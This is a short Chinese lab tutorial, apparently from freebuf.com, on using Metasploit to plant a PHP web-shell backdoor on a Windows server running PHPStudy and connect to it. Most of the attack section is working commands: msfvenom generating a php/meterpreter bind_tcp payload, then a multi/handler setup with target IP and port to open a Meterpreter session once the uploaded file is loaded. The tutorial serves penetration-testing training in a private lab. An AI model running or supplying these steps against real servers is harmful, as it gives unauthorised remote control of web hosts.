MSF连接小马
一. 概述
metasploit框架中其实也自带了php的后门,并且配合meterpreter功能强大。
bind_tcp:在这里黑客主动去连接目标主机,就叫作正向连接。适用的情况是服务器在外网的情况
reverse_tcp:在这个例子中反向连接就是被入侵的主机反过来来连接黑客,就叫作反向连接,在目标服务器在内网或有防火墙的情况下使用。
二. 环境
软件 | 版本 | 解释 |
---|---|---|
Kali Linux | 2019 | IP : 10.1.1.220 |
Windows server 2008 | R2 | IP : 10.1.1.251 |
PHPStudy | PHP5.4.45-nts+Apache | Windows系统中 |
二. 实验步骤
1. 生成小马
msfvenom -p php/meterpreter/bind_tcp lhost=10.1.1.220 lport=55555 -o msf.php
2. 上传至服务器
3. 配置Kali管理会话
msfconsole
use exploit/multi/handler
set payload php/meterpreter/bind_tcp
set LPORT 55555
set RHOST 10.1.1.251
exploit
手动在浏览器中浏览小马地址,人为触发连接事件
连接成功.
来源:freebuf.com 2020-09-14 22:58:45 by: minggege
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册